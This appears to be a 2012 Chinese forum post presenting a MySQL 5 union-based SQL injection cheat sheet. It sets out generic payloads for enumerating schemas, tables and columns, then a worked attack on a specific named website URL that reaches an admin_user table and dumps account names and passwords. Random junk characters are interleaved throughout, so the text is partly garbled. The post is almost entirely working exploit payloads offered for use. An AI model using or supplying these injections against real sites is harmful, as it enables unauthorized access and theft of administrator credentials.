查库: j; {* _. I% P/ E' E+ a
1 v. O. S+ X& u/ F' [+ \% O' c
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*7 s" U; d8 b9 [! x* x; w) H- b
. }% Q9 L& m5 i2 k. Z查表
7 v' r6 s" D7 ?( u$ v
9 u$ ]0 w' D, i& u8 T! n/ V% Fid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,18 O% ^ P! o3 z9 |: Q5 h+ ?$ J! `; @# v
# o8 F8 z. i( q2 H! u
查段
+ N! ]2 d1 r2 {. X1 Y$ V
4 _0 Z# r4 A2 r* V3 ~$ W( t. Uid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,12 M0 C/ t8 L0 G! I. z1 n% D( B4 |
6 P7 j B1 a Q5 N
5 _& D) l# A. c: \9 V" d! _mysql5高级注入方法暴表
. @& x4 d5 f( _ k% i* p- e; |1 s& U. r. C3 ^* Y
例子如下:
. H* U" A6 b. I8 o8 b) n! P( ?5 c
I5 s- g% ?$ @' ~) X* g1.爆表/ k* V0 b Q$ O: X" U0 @
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
& P( b9 H6 z+ w) @' g! Z& x2 I; ~这样爆到第4个时出现了admin_user表。 R0 t5 i5 R$ G- G$ w
/ b, V) A: u; p8 v2 }8 b8 G. h2.暴字段0 i% n1 C2 |# V6 N' K0 }% B
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*2 i# ]1 j2 b" {- s/ O4 G$ E
' P3 a6 t+ g1 z1 O3 H
# l3 X3 p4 @' |$ r3.爆密码5 D' d4 ?. d2 ~' v; n4 r6 R/ H
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
7 @. E0 c0 t- ~
# U0 c) _$ p& n3 f
! a" w7 g% c4 G+ N* f$ O |
发表于 2012-9-13 16:29:37
收藏
支持
反对